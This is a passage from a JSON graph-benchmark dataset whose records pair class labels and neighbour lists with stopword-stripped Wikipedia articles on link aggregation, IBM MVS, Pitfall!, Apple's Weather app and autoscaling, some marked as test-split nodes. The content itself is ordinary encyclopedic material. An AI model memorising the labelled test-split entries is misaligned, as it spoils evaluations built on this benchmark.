    "text": "Link_aggregation:link aggregation computer networking term link aggregation applies various methods combining aggregating multiple network connections parallel order increase throughput beyond single connection could sustain provide redundancy case one links fail link aggregation group lag combines number physical ports together make single high-bandwidth data path implement traffic load sharing among member ports group enhance connection reliability umbrella terms used describe method include port trunking link bundling ethernet/network/nic bonding channel bonding nic teaming umbrella terms encompass vendor-independent standards link aggregation control protocol lacp ethernet defined ieee 802.1ax previous ieee 802.3ad also various proprietary solutions link aggregation addresses two problems ethernet connections bandwidth limitations lack resilience regard first issue bandwidth requirements scale linearly ethernet bandwidths historically increased tenfold generation 10 megabit/s 100 mbit/s 1000 mbit/s 10,000 mbit/s one started bump bandwidth ceilings option move next generation could cost prohibitive alternative solution introduced many network manufacturers early 1990s combine two physical ethernet links one logical link via channel bonding solutions required manual configuration identical equipment sides aggregation second problem involves three single points failure typical port-cable-port connection either usual computer-to-switch switch-to-switch configuration cable either ports cable plugged fail multiple physical connections made many higher level protocols designed fail completely seamlessly network architects implement aggregation lowest three layers osi model regardless layer aggregation occurs possible balance network load across links however implementations take advantage methods provide failover well combining either occur multiple interfaces share one logical address i.e ip one physical address i.e mac address allows interface address former requires ends link use aggregation method performance advantages latter channel bonding differentiated load balancing load balancing divides traffic network interfaces per network socket layer 4 basis channel bonding implies division traffic physical interfaces lower level either per packet layer 3 data link layer 2 basis mid 1990s network switch manufacturers included aggregation capability proprietary extension increase bandwidth switches manufacturer developed method led compatibility problems ieee 802.3 group took study group create inter-operable link layer standard november 1997 meeting group quickly agreed include automatic configuration feature would add redundancy well became known link aggregation control protocol gigabit channel-bonding schemes use ieee standard link aggregation formerly clause 43 ieee 802.3 standard added march 2000 ieee 802.3ad task force nearly every network equipment manufacturer quickly adopted joint standard proprietary standards 802.3 maintenance task force report 9th revision project november 2006 noted certain 802.1 layers 802.1x security positioned protocol stack link aggregation defined 802.3 sublayer resolve discrepancy 802.3ax 802.1ax task force formed resulting formal transfer protocol 802.1 group publication ieee 802.1ax-2008 3 november 2008 within ieee specification link aggregation control protocol lacp provides method control bundling several physical ports together form single logical channel lacp allows network device negotiate automatic bundling links sending lacp packets peer directly connected device also implements lacp lacp features practical examples lacp works sending frames lacpdus links protocol enabled finds device end link also lacp enabled also independently send frames along links enabling two units detect multiple links combine single logical link lacp configured one two modes active passive active mode always send frames along configured links passive mode however acts speak spoken therefore used way controlling accidental loops long device active mode addition ieee link aggregation substandards number proprietary aggregation schemes including cisco etherchannel port aggregation protocol juniper aggregated ethernet avaya multi-link trunking split multi-link trunking routed split multi-link trunking distributed split multi-link trunking zte smartgroup huawei eth-trunk connectify speedify high-end network devices support kind link aggregation software-based implementations – *bsd lagg package linux bonding driver solaris dladm aggr etc – also exist many operating systems linux bonding driver provides method aggregating multiple network interface controllers nics single logical bonded interface two so-called nic slaves majority modern linux distributions come linux kernel linux bonding driver integrated loadable kernel module ifenslave network interface user-level control program pre-installed donald becker programmed original linux bonding driver came use beowulf cluster patches linux kernel 2.0 modes linux bonding driver network interface aggregation modes supplied parameters kernel bonding module load time may given command line arguments insmod modprobe command usually specified linux distribution-specific configuration file behavior single logical bonded interface depends upon specified bonding driver mode default parameter balance-rr linux team driver provides alternative bonding driver main difference team driver kernel part contains essential code rest code link validation lacp implementation decision making etc run userspace part teamd daemon link aggregation offers inexpensive way set high-speed backbone network transfers much data one single port device deliver link aggregation also allows network backbone speed grow incrementally demand network increases without replace everything deploy new hardware backbone installations install cabling fiber optic pairs initially necessary even immediate need additional cabling done labor costs higher cost cable running extra cable reduces future labor costs networking needs change link aggregation allow use extra cables increase backbone speeds little extra cost ports available balancing traffic network administrators often wish avoid reordering ethernet frames example tcp suffers additional overhead dealing out-of-order packets goal approximated sending frames associated particular session across link common implementations use l2 l3 hashes i.e based mac ip addresses ensuring flow always sent via physical link however may provide even distribution across links trunk single pairs hosts communicate i.e hashes provide little variation effectively limits client bandwidth aggregate single member maximum bandwidth per communication partner extreme one link fully loaded others completely idle reason even load balancing full utilization trunked links almost never reached real-life implementations advanced switches employ l4 hash i.e using tcp/udp port numbers may increase traffic variation across links – depending whether ports vary – bring balance closer even distribution multiple switches may utilized optimize maximum throughput multiple network switch topology switches configured parallel part isolated network two systems configuration switches isolated one another one reason employ topology isolated network many hosts cluster configured high performance example using multiple smaller switches cost effective single larger switch access beyond network required individual host equipped additional network device connected external network host additionally acts gateway network interfaces 1 3 computer cluster node example connected via separate network switches 1 3 network interfaces 1 3 computer cluster node b inter-connections network switches 1 3 linux bonding driver mode typically employed configurations type balance-rr balance-rr mode allows individual connections two hosts effectively utilize greater one interface bandwidth nics trunked together also provide network links beyond throughput one single nic example allows central file server establish aggregate 2-gigabit connection using two 1-gigabit nics teamed together note data signaling rate still 1gbit/s misleading depending methodologies used test throughput link aggregation employed microsoft windows server 2012 supports link aggregation natively previous windows server versions relied manufacturer support feature within device driver software intel example released advanced networking services ans bond intel fast ethernet gigabit cards.nvidia also supports teaming nvidia network access manager/firewall tool hp also teaming tool hp branded nics allow non-etherchanneled nic teaming support several modes etherchannel port aggregation including 802.3ad lacp addition basic layer-3 aggregation available least windows xp sp3 allows servers multiple ip interfaces network perform load balancing home users one internet connection increase connection speed sharing load interfaces broadcom offers advanced functions via broadcom advanced control suite bacs via teaming functionality basp broadcom advanced server program available offering 802.3ad static lags lacp smart teaming n't require configuration switches work possible configure teaming bacs mix nics different vendors long least one broadcom nics required capabilities create teaming linux freebsd netbsd openbsd macos opensolaris commercial unix distributions aix implement ethernet bonding trunking higher level hence deal nics different manufacturers drivers long nic supported kernel citrix xenserver vmware esx native support link-aggregation xenserver offers static lags well lacp vsphere 5.1 esxi supports static lags lacp natively virtual distributed switch microsoft hyper-v bonding teaming n't offered hyper-visor os-level above-mentioned methods teaming windows applies hyper-v well modes balance-rr balance-xor broadcast 802.3ad physical ports link aggregation group must reside logical switch scenarios leave single point failure physical switch links connected goes offline modes active-backup balance-tlb balance-alb also set two switches failover like modes cases active sessions may fail due arp problems restarted however almost vendors proprietary extensions resolve issue aggregate multiple physical switches one logical switch split multi-link trunking smlt protocol allows multiple ethernet links split across multiple switches stack preventing single point failure additionally allowing switches load balanced across multiple aggregation switches single access stack devices synchronize state across inter-switch trunk ist appear connecting access device single device switch block prevent packet duplication smlt provides enhanced resiliency sub-second failover sub-second recovery speed trunks 10 mbit/s 100 mbit/s 1,000 mbit/s 10 gbit/s operating transparently end-devices implementations ports used aggregation consist physical type copper ports 10/100/1000base‑t multi-mode fiber ports single-mode fiber ports however ieee standard requires link full duplex identical speed 10 100 1,000 10,000 mbit/s many switches phy independent meaning switch could mixture copper sx lx lx10 gbics maintaining phy usual approach possible aggregate 1000base-sx fiber one link 1000base-lx longer diverse path second link important thing speed 1 gbit/s full duplex links one path may slightly longer propagation time standard engineered cause issue aggregation mismatch refers matching aggregation type ends link switches implement 802.1ax standard support static configuration link aggregation therefore link aggregation similarly statically configured switches work fail statically configured switch device configured lacp ethernet interfaces channel bonding requires assistance ethernet switch host computer operating system must stripe delivery frames across network interfaces manner i/o striped across disks raid 0 array reason discussions channel bonding also refer redundant array inexpensive nodes rain redundant array independent network interfaces analog modems multiple dial-up links pots may bonded throughput bonded connections come closer aggregate bandwidth bonded links throughput routing schemes simply load-balance outgoing network connections links similarly multiple dsl lines bonded give higher bandwidth united kingdom adsl sometimes bonded give example 512kbit/s upload bandwidth 4 megabit/s download bandwidth areas access 2 megabit/s bandwidth docsis 3.0 3.1 specifications data cable tv catv systems multiple channels may bonded docsis 3.0 32 downstream 8 upstream channels may bonded typically 6 8mhz wide docsis 3.1 defines complicated arrangements involving aggregation level subcarriers larger notional channels broadband bonding type channel bonding refers aggregation multiple channels osi layers level four channels bonded wired links t-1 dsl line additionally possible bond multiple cellular links aggregated wireless bonded link previous bonding methodologies resided lower osi layers requiring coordination telecommunications companies implementation broadband bonding implemented higher layers done without coordination commercial implementations broadband channel bonding include see also mimo",
    "neighbors": [
      3328,
      9603,
      1284,
      7045,
      8708,
      2184,
      5384,
      6797,
      10005,
      5270,
      1303,
      9625,
      10906,
      10016,
      5671,
      6187,
      172,
      4396,
      7983,
      434,
      3762,
      6834,
      823,
      9655,
      1977,
      7865,
      11321,
      5437,
      4671,
      5439,
      3780,
      9285,
      330,
      3156,
      10332,
      11363,
      4581,
      5093,
      5863,
      4589,
      8432,
      1395,
      7411,
      11125,
      6904,
      3450,
      8828,
      3838
    ],
    "mask": "Test"
  },
  {
    "node_id": 7050,
    "label": 3,
    "text": "International_Symposium_on_Microarchitecture:international symposium microarchitecture international symposium microarchitecture micro generally viewed top-tier academic conference computer architecture confused micro-conference",
    "neighbors": [
      995,
      9932
    ],
    "mask": "Train"
  },
  {
    "node_id": 7051,
    "label": 3,
    "text": "Pitfall!:pitfall pitfall video game designed david crane atari 2600 released activision 1982 player controls pitfall harry tasked collecting treasures jungle within 20 minutes avoiding obstacles hazards pitfall received positive reviews upon release one best-selling games atari 2600 four million copies sold top video game billboard charts year inspired numerous sequels ports across variety gaming consoles helped define side-scrolling platformer genre player controls character pitfall harry maze-like jungle attempt recover 32 treasures 20-minute time period along way players must maneuver numerous hazards including pits quicksand rolling logs fire rattlesnakes scorpions crocodiles harry may jump otherwise avoid obstacles climbing running swinging vines treasure includes bags money gold silver bars diamond rings range value 2000 5000 points 1000 point increments eight treasure type 32 total perfect score 114,000 achieved claiming 32 treasures without losing points points deducted either falling hole 100 points touching logs point loss depends long contact made log jungle tunnel harry access ladders found various points traveling though tunnel moves forward three screens time necessary order collect treasures within time limit however tunnels filled dead-ends blocked brick walls forcing player return surface one ladders try find way around thus wasting time tunnels also contain scorpions player loses life harry comes contact obstacle except logs falls tar pit quicksand waterhole mouth crocodile game ends either 32 treasures collected three lives lost time run pitfall created david crane programmer worked activision early 1980s november 2003 interview edge described 1979 developed technology display realistic running man 1982 searching suitable game use game technical achievements included non-flickering multicolored animated sprites system notoriously primitive graphics hardware innovative techniques used keep code space within 4k limit including polynomial counter create 256 screens within 50 bytes code swinging vines created repeatedly displaying atari one-pixel ball sprite different offsets several ports made computer systems msx commodore 64 atari 800 well home consoles colecovision intellivision versions pitfall ported home computers different names around 1983 one version 'trapfall ken kalish tom mix software tandy coco licensed sold part cuthbert series dragon 32 cuthbert jungle microdeal united kingdom version re-ported back computers like commodore 64 pitfall originally sold anyone scored 20,000 points could send activision picture television screen receive pitfall harry explorer club patch television commercial pitfall featured then-child actor jack black age 13 first tv role possibly great success raiders lost ark pitfall atari 2600 best-selling home video game 1982 first quarter 1983 mid-january 1983 top-selling game billboard chart seven weeks—much successful rival e.t atari paid 21 million license—and remained number one position 64 weeks row danny goodman creative computing video arcade games stated pitfall standout among dozens 2600 games announced summer 1982 consumer electronics show original cartridge vcs without arcade express reviewed atari 2600 version pitfall august 1982 stating may well best adventure game yet produced vcs giving score 8 10 electronic games june 1983 praised 2600 version superb graphics varied play-action goodman surprised intellivision version graphics greatly improved 2600 video games march 1983 criticized activision enhancing intellivision version graphics know graphics intellivision vcs improvements pitfall 2600 version pitfall awarded best adventure video game 4th annual arkie awards 2013 entertainment weekly listed one ten best atari 2600 games crane produced atari 2600 sequel 1983 pitfall series appeared nintendo entertainment system november 1987 form super pitfall reworking 1985 activision licensed pitfall sega made arcade version lost caverns game thoroughly remade first level resembling original pitfall second level resembling caverns pitfall ii later levels completely original version adapted sg-1000 pitfall produced commodore 64 apple ii home computers using garry kitchen gamemaker primarily demonstration game building software closer 16-bit platformers atari 2600 games made debut super nintendo entertainment system mega drive/genesis 1994 later appeared sega cd sega 32x consoles game ported windows 95 operating system atari jaguar 1995 recent re-release 2001 game boy advance mayan adventure includes original pitfall game easter egg 1998 featuring voice bruce campbell pitfall harry jr. released playstation game boy color without 3d designation 2004 fourth sequel released playstation 2 gamecube xbox game includes original pitfall pitfall ii games port lost expedition pitfall big adventure released wii september 23 2008 may 2010 pitfall released microsoft game room service xbox 360 console windows-based pcs also ported game room xbox live title windows phone february 2011 august 9 2012 activision released pitfall ios iphone ipad ipod touch december 21 activision released pitfall android free app version game departed 2d graphics seen original instead used 3d graphics gameplay also altered game endless runner style temple run month crane announced kickstarter jungleventure spiritual successor original games goal raise us 900,000 project failed reach target raising 31,207 crane said reason people thought asking much money everyone turned soon saw price pitfall generally viewed created side-scrolling platforming genre although scroll features games ability travel multiple levels play game also much longer atari 2600 games time typically lasted minutes due majority games ports arcade games short play time encouraged players spend money pitfall considered one influential games atari 2600 system introduced jungle setting video games many game mechanics used games like prince persia 1983 pitfall made animated television debut segment cbs saturday supercade cartoon lineup name pitfall harry basic plotline involved harry voiced robert ridgely niece rhonda voiced noelle north cowardly mountain lion quickclaw voiced kenneth mars exploring various locations hidden treasure one season pitfall harry frogger donkey kong jr. replaced kangaroo space ace",
    "neighbors": [
      1346,
      3075,
      5091,
      9732,
      6539,
      10316,
      6797,
      9006,
      7983,
      9998,
      10093,
      10576,
      921
    ],
    "mask": "None"
  },
  {
    "node_id": 7052,
    "label": 2,
    "text": "Weather_(Apple):weather apple weather preinstalled mobile app ipod touch iphone bundled ios since iphone os 1 app allows user see weather number selected cities locations added pressing list icon plus icon allows user type city name zip code postal code airport code locations removed tapping list icon swiping left location user wants delete weather app ios 8 updated use weather channel source information weather rather yahoo weather ios 10 later app removed home screen user wishes ios 12 information weather displayed ios device lock screen alarm set device ’ “ bedtime ” feature goes",
    "neighbors": [
      10755,
      9732,
      5647,
      7697,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      3691,
      2673,
      7292,
      2686,
      6783,
      10878,
      5784,
      1177,
      3228,
      2207,
      11430,
      2735,
      3248,
      4283,
      3772,
      7869,
      3286,
      9430,
      3293,
      4318,
      6884,
      9451,
      1772,
      7420,
      1290,
      3338,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7983,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      7496,
      4957,
      6495,
      9063,
      3948,
      10608,
      2439,
      6023,
      6539,
      3483,
      2979,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      487,
      2023,
      7154
    ],
    "mask": "None"
  },
  {
    "node_id": 7053,
    "label": 2,
    "text": "MVS:mvs multiple virtual storage commonly called mvs commonly used operating system system/370 system/390 ibm mainframe computers developed ibm unrelated ibm mainframe operating systems e.g. vse vm tpf first released 1974 mvs extended program products new names multiple times first ibm described mvs simply new release os/vs2 fact major rewrite os/vs2 release 1 upgrade os/360 mvt retained original code like mvt mainly written assembly language mvs core almost entirely written assembler xf although modules written pl/s performance-sensitive ones particular input/output supervisor ios ibm use os/vs2 emphasized upwards compatibility application programs ran mvt even need recompiling run mvs job control language files could used unchanged utilities non-core facilities like tso ran unchanged ibm users almost unanimously called new system mvs start ibm continued use term mvs naming later major versions mvs/xa os/360 mft multitasking fixed number tasks provided multitasking several memory partitions fixed size set operating system installed operator redefined example could small partition two medium partitions large partition two large programs ready run one would wait finished vacated large partition os/360 mvt multitasking variable number tasks enhancement refined memory use instead using fixed-size memory partitions mvt allocated memory regions job steps needed provided enough contiguous physical memory available significant advance mft memory management weaknesses job allocated memory dynamically sort programs database management systems programmers estimate job maximum memory requirement pre-define mvt job step contained mix small large programs wasted memory small programs ran seriously memory could become fragmented i.e. memory used current jobs could divided uselessly small chunks areas used current jobs remedy wait current jobs finished starting new ones early 1970s ibm sought mitigate difficulties introducing virtual memory ibm called virtual storage allowed programs request address spaces larger physical memory original implementations single virtual address space shared jobs os/vs1 os/360 mft within single virtual address space os/vs2 svs os/360 mvt within single virtual address space os/vs1 svs principle disadvantages mft mvt impacts less severe jobs could request much larger address spaces requests came 16 mb pool even physical storage smaller mid-1970s ibm introduced mvs supported virtual storage larger available real storage svs also allowed indefinite number applications run different address spaces two concurrent programs might try access virtual memory address virtual memory system redirected requests different areas physical memory address spaces consisted three areas operating system one instance shared jobs application area unique application shared virtual area used various purposes including inter-job communication ibm promised application areas would always least 8 mb made mvs perfect solution business problems resulted need run applications mvs maximized processing potential providing multiprogramming multiprocessing capabilities like mvt os/vs2 svs predecessors mvs supported multiprogramming program instructions associated data scheduled control program given processing cycles unlike single-programming operating system systems maximize use processing potential dividing processing cycles among instructions associated several different concurrently running programs way control program wait i/o operation complete proceeding executing instructions multiple programs computer able switch back forth active inactive programs early editions mvs mid-1970s among first ibm os series support multiprocessor configurations though m65mp variant os/360 running 360 models 65 67 provided limited multiprocessor support 360 model 67 also hosted multiprocessor capable tss/360 mts cp-67 operating systems multiprocessing systems execute instructions simultaneously offer greater processing power single-processing system result mvs able address business problems brought need process large amounts data multiprocessing systems either loosely coupled means computer access common workload tightly coupled means computers share real storage controlled single copy operating system mvs retained loosely coupled multiprocessing attached support processor asp tightly coupled multiprocessing os/360 model 65 multiprocessing tightly coupled systems two cpus shared concurrent access memory copy operating system peripherals providing greater processing power degree graceful degradation one cpu failed loosely coupled configurations group processors single tightly coupled memory operating system shared peripherals operating system component jes3 allowed managing whole group one console provided greater resilience let operators decide processor run jobs central job queue mvs jes3 gave users opportunity network together two data processing systems via shared disks channel-to-channel adapters ctca capability eventually became available jes2 users multi-access spool mas mvs originally supported 24-bit addressing i.e. 16 mb underlying hardware progressed supported 31-bit xa esa 2048 mb z/os 64-bit addressing significant motives rapid upgrade 31-bit addressing growth large transaction-processing networks mostly controlled cics ran single address space—and db2 relational database management system needed 8 mb application address space run efficiently early versions configured two address spaces communicated via shared virtual area imposed significant overhead since communications transmit via operating system main user interfaces mvs job control language jcl originally designed batch processing 1970s onwards also used start allocate resources long-running interactive jobs cics tso time sharing option interactive time-sharing interface mainly used run development tools end-user information systems ispf tso application users 3270-family terminals later vm well allows user accomplish tasks tso command line menu form oriented manner full screen editor file browser tso basic interface command line although facilities added later form-driven interfaces mvs took major step forward fault-tolerance built earlier stae facility ibm called software recovery ibm decided years practical real-world experience mvt business world system failures major impacts customer businesses ibm decided take major design jump assume despite best software development testing techniques 'problems occur profound assumption pivotal adding great percentages fault-tolerance code system likely contributed system success tolerating software hardware failures statistical information hard come prove value design features measure 'prevented 'recovered problems ibm many dimensions enhanced fault-tolerant software recovery rapid problem resolution features time design specified hierarchy error-handling programs system kernel/'privileged mode called functional recovery routines user 'task 'problem program mode called estae extended specified task abnormal exit routines invoked case system detected error actually hardware processor storage error software error recovery routine made 'mainline function reinvokable captured error diagnostic data sufficient debug causing problem either 'retried reinvoke mainline 'percolated escalated error processing next recovery routine hierarchy thus error system captured diagnostic data attempted perform repair keep system worst thing possible take user address space 'job case unrepaired errors though initial design point recent mvs version z/os recovery program guaranteed recovery routine recovery routine recovery routine recovery structure embedded basic mvs control program programming facilities available used application program developers 3rd party developers practically mvs software recovery made problem debugging easier difficult software recovery requires programs leave 'tracks thus facilitating debugging—but fact processing progresses despite error overwrite tracks early data capture time error maximizes debugging facilities exist recovery routines task system mode ibm included additional criteria major software problem required ibm service mainline component failed initiate software recovery considered valid reportable failure also recovery routine failed collect significant diagnostic data original problem solvable data collected recovery routine ibm standards dictated fault reportable required repair thus ibm standards rigorously applied encouraged continuous improvement ibm introduced on-demand hypervisor major serviceability tool called dynamic support system dss first release mvs facility could invoked initiate session create diagnostic procedures invoke already-stored procedures procedures 'trapped special events loading program device i/o system procedure calls triggered activation previously defined procedures procedures could invoked recursively allowed reading writing data alteration instruction flow program event recording hardware used due overhead tool removed customer-available mvs systems program-event recording per exploitation performed enhancement diagnostic slip command introduction per support slip/per su 64/65 1978 multiple copies mvs ibm operating systems could share machine machine controlled vm/370 case vm/370 real operating system regarded guest operating systems applications unusually high privileges result later hardware enhancements one instance operating system either mvs vm guests could also occupy logical partition lpar instead entire physical system multiple mvs instances organized collectively administered structure called systems complex sysplex introduced september 1990 instances interoperate software component called cross-system coupling facility xcf hardware component called hardware coupling facility cf integrated coupling facility icf co-located mainframe hardware multiple sysplexes joined via standard network protocols ibm proprietary systems network architecture sna recently via tcp/ip z/os operating system mvs recent descendant also native support execute posix single unix specification applications support began mvs/sp v4r3 ibm obtained unix 95 certification z/os v1r2 later system typically used business banking applications often written cobol cobol programs traditionally used transaction processing systems like ims cics program running cics special exec cics statements inserted cobol source code preprocessor translator replaces exec cics statements appropriate cobol code call cics program compiled — altogether unlike sql used call db2 applications also written languages c c++ java assembly language fortran basic rpg rexx language support packaged common component called language environment le allow uniform debugging tracing profiling language independent functions mvs systems traditionally accessed 3270 terminals pcs running 3270 emulators however many mainframe applications days custom web gui interfaces z/os operating system built-in support tcp/ip system management done past 3270 terminal done hardware management console hmc increasingly web interfaces operator consoles provided 2074 emulators unlikely see s/390 zseries processor real 3270 connected native character encoding scheme mvs peripherals ebcdic tr instruction made easy translate 7- 8-bit codes time ibm added hardware-accelerated services perform translation larger codes hardware-specific service unicode transforms software support e.g. ascii iso/iec 8859 utf-8 utf-16 utf-32 software translation services take source destination code pages inputs files properly called data sets mvs names files organized catalogs vsam files data set names dsns mainframe term filenames organized hierarchy whose levels separated dots e.g dept01.system01.file01 level hierarchy eight characters long total filename length maximum 44 characters including dots convention components separated dots used organize files similarly directories operating systems example utility programs performed similar functions windows explorer without gui usually batch processing mode adding renaming deleting new elements reporting contents specified element however unlike many systems levels usually actual directories naming convention like original macintosh file system folder hierarchy illusion maintained finder tso supports default prefix files similar current directory concept racf supports setting access controls based filename patterns analogous access controls directories platforms members os family mvs data sets record-oriented mvs inherited three main types predecessors sequential isam datasets could store either fixed-length variable length records types could occupy one disk volume based vtoc disk structure early ibm database management systems used various combinations isam bdam datasets usually bdam actual data storage isam indexes early 1970s ibm virtual memory operating systems introduced new file management component vsam provided similar facilities vsam formats became basis ibm database management systems ims/vs db2 usually esds actual data storage ksds indexes vsam also included catalog component used mvs master catalog partitioned data sets pds sequential data sets subdivided members could processed sequential files right like folder hierarchical file system important use pdses program libraries system administrators used main pds way allocate disk space project project team created edited members uses pdss libraries frequently used job control procedures procs “ copy books ” programming language statements record definitions used several programs generation data groups gdgs groups like named data sets referenced absolute generation number offset recent generation originally designed support grandfather-father-son backup procedures file modified changed version became new son previous son became father previous father became grandfather previous grandfather deleted one could set gdgs 3 generations applications used gdgs collect data several sources feed information one program collecting program created new generation file final program read whole group single sequential file specifying generation jcl modern versions mvs e.g. z/os also support posix-compatible slash filesystems along facilities integrating two filesystems os make mvs dataset appear file posix program subsystem newer filesystems include hierarchical file system hfs confused apple hierarchical file system zfs confused sun zfs programs running network-connected computers as/400 use local data management interfaces transparently create manage access vsam record-oriented files using client-server products implemented according distributed data management architecture ddm ddm also base architecture mvs db2 server implements distributed relational database architecture drda mvs part z/os older mvs releases longer supported ibm since 2007 64-bit z/os releases supported z/os supports running older 24-bit 31-bit mvs applications alongside 64-bit applications mvs releases 3.8j 24-bit released 1981 freely available possible run mvs 3.8j release mainframe emulators free mvs/370 generic term versions mvs operating system prior mvs/xa system/370 architecture time mvs released supported 24-bit virtual addresses mvs/370 operating system architecture based 24-bit address 24-bit address length programs running mvs/370 given 16 megabytes contiguous virtual storage mvs/xa multiple virtual storage/extended architecture version mvs supported 370-xa architecture expanded addresses 24 bits 31 bits providing 2 gigabyte addressable memory area also supported 24-bit legacy addressing mode older 24-bit applications i.e stored 24-bit address lower 24 bits 32-bit word utilized upper 8 bits word purposes mvs/esa mvs enterprise system architecture version mvs first introduced mvs/sp version 3 february 1988 replaced by/renamed os/390 late 1995 subsequently z/os mvs/esa openedition upgrade version 4 release 3 mvs/esa announced february 1993 support posix standards initial release national institute standards technology nist certification federal information processing standard fips 151 compliance subsequent releases certified higher levels organizations e.g x/open successor open group included 1 million new lines code provide api shell utilities extended user interface works hierarchical file system provided dfsms data facility system managed storage shell utilities based mortice kerns interopen products independent specialists estimate 80 open systems-compliant—more unix systems dce2 support announced february 1994 many application development tools march 1995 mid 1995 open features became standard part vanilla mvs/esa sp version 5 release 1 ibm stopped distinguishing openedition operating system os/390 became unix system services kept name z/os late 1995 ibm bundled mvs several program products changed name mvs/esa os/390 current level mvs marketed z/os japanese mainframe manufacturers fujitsu hitachi repeatedly illegally obtained ibm mvs source code internal documentation one 20th century famous cases industrial espionage fujitsu relied heavily ibm code msp mainframe operating system likewise hitachi vos3 operating system msp vos3 heavily marketed japan still hold substantial share mainframe installed base also degree countries notably australia even ibm bugs documentation misspellings faithfully copied ibm cooperated u.s. federal bureau investigation sting operation reluctantly supplying fujitsu hitachi proprietary mvs mainframe hardware technologies course multi-year investigations culminating early 1980s—investigations implicated senior company managers even japanese government officials amdahl however involved fujitsu theft ibm intellectual property communications amdahl fujitsu amdahl specifications scrupulously cleansed ibm ip references ibm ip subsequent investigations ibm reached multimillion-dollar settlements fujitsu hitachi collecting substantial fractions companies profits many years reliable reports indicate settlements exceeded us 500,000,000 three companies long since amicably agreed many joint business ventures example 2000 ibm hitachi collaborated developing ibm z900 mainframe model historical copying msp vos3 properly classified forks mvs many third party software vendors mvs-compatible products able produce msp- vos3-compatible versions little modification ibm introduced 64-bit z/architecture mainframes year 2000 ibm also introduced 64-bit z/os operating system direct successor os/390 mvs fujitsu hitachi opted license ibm z/architecture quasi-mvs operating systems hardware systems msp vos3 still nominally supported vendors maintain mvs 1980s architectural limitations present day since z/os still supports mvs-era applications technologies—indeed z/os still contains mvs code albeit greatly enhanced improved decades evolution—applications operational procedures running msp vos3 move z/os much easily operating systems",
    "neighbors": [
      6148,
      7,
      3598,
      6675,
      7188,
      8213,
      10273,
      9762,
      4645,
      5160,
      10280,
      5677,
      7217,
      10803,
      7733,
      2616,
      573,
      2625,
      9286,
      8272,
      9814,
      8290,
      5220,
      9829,
      6248,
      119,
      2168,
      2172,
      9343,
      2179,
      10883,
      9361,
      9370,
      7836,
      7848,
      8872,
      5293,
      10413,
      8879,
      6325,
      8889,
      11450,
      1219,
      8388,
      8900,
      6342,
      7881,
      8393,
      8911,
      5840,
      8402,
      1235,
      2775,
      9977,
      3323,
      9468,
      2813,
      3841,
      5378,
      7943,
      2314,
      10508,
      8975,
      11024,
      11539,
      789,
      5397,
      3358,
      3359,
      3872,
      6442,
      1323,
      7983,
      7477,
      8502,
      10040,
      8509,
      11075,
      840,
      7507,
      340,
      863,
      3938,
      868,
      3429,
      6503,
      3443,
      5492,
      375,
      8063,
      4996,
      10628,
      10632,
      11656,
      909,
      7053,
      8077,
      9619,
      11673,
      5531,
      10652,
      6557,
      421,
      11184,
      9137,
      8114,
      9139,
      437,
      4535,
      1464,
      3512,
      5562,
      7607,
      3522,
      4546,
      964,
      6087,
      477,
      5598,
      5603,
      11236,
      4589,
      9724,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7054,
    "label": 7,
    "text": "Autoscaling:autoscaling autoscaling also spelled auto scaling auto-scaling sometimes also called automatic scaling method used cloud computing whereby amount computational resources server farm typically measured terms number active servers scales automatically based load farm closely related builds upon idea load balancing autoscaling offers following advantages autoscaling differs fixed daily weekly yearly cycle server use responsive actual usage patterns thus reduces potential downside many servers traffic load instance traffic usually lower midnight static scaling solution might schedule servers sleep night might result downtime night people happen use internet instance due viral news event autoscaling hand handle unexpected traffic spikes better list use terminology used amazon web services aws however alternative names noted terminology specific names amazon services used names amazon web services launched amazon elastic compute cloud ec2 service august 2006 allowed developers programmatically create terminate instances machines time initial launch aws offer autoscaling ability programmatically create terminate instances gave developers flexibility write code autoscaling third-party autoscaling software aws began appearing around april 2008 included tools scalr rightscale rightscale used animoto able handle facebook traffic adopting autoscaling may 18 2009 amazon launched autoscaling feature along elastic load balancing part amazon elastic compute cloud autoscaling integral component amazon ec2 offering autoscaling amazon web services done web browser command line tool.. may 2016 autoscaling also offered aws ecs service on-demand video provider netflix documented use autoscaling amazon web services meet highly variable consumer needs found aggressive scaling delayed cautious scaling served goals uptime responsiveness best article techcrunch zev laderman co-founder ceo newvem service helps optimize aws cloud infrastructure recommended startups use autoscaling order keep amazon web services costs low various best practice guides aws use suggest using autoscaling feature even cases load variable autoscaling offers two advantages automatic replacement instances become unhealthy reason hardware failure network failure application error automatic replacement spot instances get interrupted price capacity reasons making feasible use spot instances production purposes netflix internal best practices require every instance autoscaling group conformity monkey terminates instance autoscaling group order enforce best practice june 27 2013 microsoft announced adding autoscaling support windows azure cloud computing platform documentation feature available microsoft developer network oracle cloud platform allows server instances automatically scale cluster defining auto-scaling rule rules based cpu and/or memory utilization determine add remove nodes november 17 2014 google compute engine announced public beta autoscaling feature use google cloud platform applications march 2015 autoscaling tool still beta blog post august 2014 facebook engineer disclosed company started using autoscaling bring energy costs blog post reported 27 decline energy use low traffic hours around midnight 10-15 decline energy use typical 24-hour cycle kubernetes horizontal pod autoscaler automatically scales number pods replication controller deployment replicaset based observed cpu utilization beta support application-provided metrics autoscaling default uses reactive decision approach dealing traffic scaling scaling happens response real-time changes metrics cases particularly changes occur quickly reactive approach scaling insufficient two kinds autoscaling decision approaches described approach autoscaling changes made minimum size maximum size desired capacity autoscaling group specific times day scheduled scaling useful instance known traffic load increase decrease specific times day change sudden reactive approach based autoscaling respond fast enough aws autoscaling groups support scheduled scaling approach autoscaling uses predictive analytics idea combine recent usage trends historical usage data well kinds data predict usage future autoscale based predictions parts infrastructure specific workloads netflix found scryer predictive analytics engine gave better results amazon reactive autoscaling approach particular better november 20 2018 aws announced predictive scaling would available part autoscaling offering",
    "neighbors": [
      4194,
      5223,
      4236,
      7248,
      7537,
      5660
    ],
    "mask": "Test"
  },
  {
    "node_id": 7055,
    "label": 9,
